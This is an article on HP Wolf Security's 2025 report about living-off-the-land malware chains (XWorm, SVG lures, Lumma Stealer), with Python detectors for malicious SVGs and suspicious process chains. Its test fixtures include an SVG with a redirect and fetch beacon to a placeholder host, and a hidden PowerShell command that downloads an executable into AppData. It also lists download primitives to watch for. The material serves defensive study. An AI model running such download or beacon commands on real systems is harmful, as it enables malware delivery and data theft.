The Art of Digital Evasion: How Attackers Hide in Plain Sight
In the second quarter of 2025, experts at HP Wolf Security documented a wave of sophisticated attacks in which adversaries employed unconventional living-off-the-land (LOTL) tactics to evade detection. Multiple obscure system utilities were brought into play, while final malicious payloads were concealed within inconspicuous formats such as images or SVG files. This approach significantly complicates detection and enables attackers to remain hidden for extended periods.
In one incident, researchers detailed how a carefully chained sequence of Windows utilities delivered XWorm, a remote access trojan (RAT) with credential-stealing capabilities. The initial vector was email attachments with a .CHM extension, disguised as documentation. Hidden inside was a script that triggered a multistage infection chain.
The process involved a binary that copied cscript.exe into a public directory. A VBScript was then placed in the same folder and executed via PowerShell, which in turn retrieved a JavaScript file into ProgramData and launched it with the native Windows interpreter. The pivotal stage came with the download of an image from Tagbox, a legitimate digital asset management service. The image contained an encrypted payload that was decoded into a Bitmap object and ultimately executed through MSBuild, allowing the trojan to infiltrate the system while bypassing most security filters.
Researchers also highlighted campaigns leveraging SVG files. These objects open directly in browsers and function essentially like HTML pages, capable of embedding JavaScript or pulling in external resources. In several attacks, victims were presented with a convincing replica of an Acrobat Reader page complete with a loading animation. After simulating a “document download,” the page prompted the victim to retrieve an archive, which in reality redirected them to an external server. There, a ZIP file containing encrypted JavaScript was served. This strategy granted initial access while geofencing restrictions ensured that downloads were limited to certain regions, frustrating analysts and delaying detection.
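Because an SVG is XML that a browser treats much like an HTML page, the active content the report describes (embedded script, event handlers, references to external servers) is visible to a parser before the file is ever rendered. The following Python inspector is an added example, not code from HP Wolf Security or from the campaigns discussed; the two sample documents and the `lure.example` host are constructed for illustration, and the finding names are this example's own.

```python
import xml.etree.ElementTree as ET

# Constructed sample: a plain icon with no active content.
BENIGN_SVG = """<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">
  <circle cx="5" cy="5" r="4" fill="#06c"/>
</svg>"""

# Constructed sample mimicking the lure pattern: script, a remote image
# (loading animation) and an inline event handler. Host is a placeholder.
SUSPICIOUS_SVG = """<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink">
  <script>window.location = "https://lure.example/download"</script>
  <image xlink:href="https://lure.example/loading.gif" width="10" height="10"/>
  <rect width="10" height="10" onload="fetch('https://lure.example/beacon')"/>
</svg>"""


def _local(qualified_name):
    """Strip the '{namespace}' prefix ElementTree puts on tag/attribute names."""
    return qualified_name.rpartition("}")[2]


def inspect_svg(svg_text):
    """Return a list of (finding, detail) tuples for active content in an SVG.

    Findings: 'script-element', 'foreignObject', 'event-handler',
    'external-resource' (http/https/protocol-relative href) and 'javascript-uri'.
    An empty list means nothing in the document can execute or reach out.
    """
    findings = []
    root = ET.fromstring(svg_text)
    for el in root.iter():
        tag = _local(el.tag).lower()
        if tag == "script":
            findings.append(("script-element", (el.text or "").strip()[:40]))
        if tag == "foreignobject":
            findings.append(("foreignObject", "embedded HTML content"))
        for attr, value in el.attrib.items():
            name = _local(attr).lower()
            val = value.strip()
            low = val.lower()
            if name.startswith("on"):          # onload, onclick, onerror, ...
                findings.append(("event-handler", f"{tag}@{name}"))
            elif name == "href":               # covers both href and xlink:href
                if low.startswith(("http://", "https://", "//")):
                    findings.append(("external-resource", f"{tag} -> {val}"))
                elif low.startswith("javascript:"):
                    findings.append(("javascript-uri", f"{tag}@{name}"))
    return findings


def is_active_svg(svg_text):
    """True when the SVG carries script, handlers or remote references."""
    return bool(inspect_svg(svg_text))


if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_SVG), ("suspicious", SUSPICIOUS_SVG)):
        print(label, inspect_svg(doc))
```

The check is deliberately structural rather than signature-based: a mail gateway or sandbox can apply it to every SVG attachment, and a legitimate icon or chart almost never needs `<script>`, `on*` handlers or an `http(s)` `href`, so any hit is worth quarantining for review. Parsing with ElementTree also means obfuscation inside attribute values does not matter; the element and attribute names alone decide.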
Particular attention was also given to renewed activity by Lumma Stealer. Although parts of its infrastructure were dismantled in May 2025, new campaigns surfaced in June. In these, malicious code was hidden inside IMG image files attached to phishing emails. The image contained an HTA file disguised as an invoice, its code obscured with long sequences of spaces to hinder superficial analysis. When executed, the HTA ran a PowerShell command that downloaded an NSIS installer. The installer created fake registry entries and referenced nonexistent files to mislead forensic investigators. Another PowerShell stage then unpacked and executed a file from AppData, eventually activating Lumma Stealer, which is capable of exfiltrating credentials and other sensitive data.
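Both the XWorm chain (a copied cscript.exe in a public directory, PowerShell running a VBScript, a JavaScript stage in ProgramData, MSBuild executing the decoded payload) and the Lumma chain (an HTA launching a PowerShell download, a later stage run from AppData) share a few process-level traits that endpoint telemetry exposes regardless of how the payload itself is hidden. The detector below is an added example written for this article, not HP Wolf Security's or any vendor's rule set; the process events are constructed to resemble process-creation records (image, parent image, command line), the host `placeholder.invalid` is a placeholder, and the rule names are this example's own.

```python
import ntpath
from dataclasses import dataclass

# Interpreters that should rarely spawn one another or MSBuild on a workstation.
SCRIPT_HOSTS = {"cscript.exe", "wscript.exe", "mshta.exe", "powershell.exe", "pwsh.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# Locations the report's chains used to stage copies, scripts and payloads.
USER_WRITABLE = ("c:\\users\\public\\", "c:\\programdata\\", "\\appdata\\")
DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest",
                    "iwr ", "net.webclient", "start-bitstransfer")


@dataclass
class ProcEvent:
    image: str          # full path of the new process
    parent_image: str   # full path of the parent process
    cmdline: str        # command line of the new process


def _base(path):
    return ntpath.basename(path).lower()


def evaluate(ev):
    """Return the list of rule names the single event matches (empty if clean)."""
    hits = []
    img, parent = ev.image.lower(), ev.parent_image.lower()
    name, pname = _base(img), _base(parent)
    cmd = ev.cmdline.lower()

    # 1. Windows Script Host running from anywhere but the system directories
    #    (the XWorm chain copied cscript.exe into a public folder).
    if name in ("cscript.exe", "wscript.exe") and not img.startswith(SYSTEM_DIRS):
        hits.append("script-host-outside-system32")
    # 2. An interpreter or MSBuild given a file that lives in a user-writable path.
    if name in SCRIPT_HOSTS | {"msbuild.exe"} and any(d in cmd for d in USER_WRITABLE):
        hits.append("payload-in-user-writable-dir")
    # 3. MSBuild started by a scripting engine: builds do not come from scripts.
    if name == "msbuild.exe" and pname in SCRIPT_HOSTS:
        hits.append("msbuild-from-script-host")
    # 4. PowerShell launched by mshta.exe (the HTA stage of the Lumma chain).
    if name in ("powershell.exe", "pwsh.exe") and pname == "mshta.exe":
        hits.append("powershell-from-mshta")
    # 5. PowerShell whose command line carries a download primitive.
    if name in ("powershell.exe", "pwsh.exe") and any(m in cmd for m in DOWNLOAD_MARKERS):
        hits.append("powershell-download-cmdlet")
    # 6. Generic interpreter-to-interpreter hop, the backbone of both chains.
    if name in SCRIPT_HOSTS and pname in SCRIPT_HOSTS:
        hits.append("script-host-chain")
    return hits


def scan(events):
    """Return [(index, hits)] for every event that matched at least one rule."""
    results = []
    for i, ev in enumerate(events):
        hits = evaluate(ev)
        if hits:
            results.append((i, hits))
    return results


# Constructed sample telemetry: one benign service start and three events
# shaped like the stages described in the article.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\svchost.exe",
              r"C:\Windows\System32\services.exe",
              "svchost.exe -k netsvcs"),
    ProcEvent(r"C:\Users\Public\cscript.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Users\Public\cscript.exe C:\Users\Public\stage1.vbs"),
    ProcEvent(r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
              r"C:\Windows\System32\wscript.exe",
              r"MSBuild.exe C:\ProgramData\build.xml"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\mshta.exe",
              r"powershell -w hidden -c Invoke-WebRequest http://placeholder.invalid/setup.exe "
              r"-OutFile C:\Users\x\AppData\Local\Temp\setup.exe"),
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS):
        print(idx, _base(SAMPLE_EVENTS[idx].image), hits)
```

None of these rules depends on the image, SVG or IMG container that carried the payload; they key on parent-child relationships and file locations, which is why LOTL chains that swap in a different obscure utility or a new hosting service still trip them. In production the same logic would run over Sysmon or EDR process-creation events, and the first rule in particular is close to a zero-false-positive signal on managed endpoints.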
Thus, the second quarter of 2025 was marked by attacks combining obscure Windows utilities, atypical file formats, and multilayered loading mechanisms. Analysts emphasize that these techniques are evolving at a rapid pace, with adversaries even reviving malware families whose infrastructures had only recently been disrupted.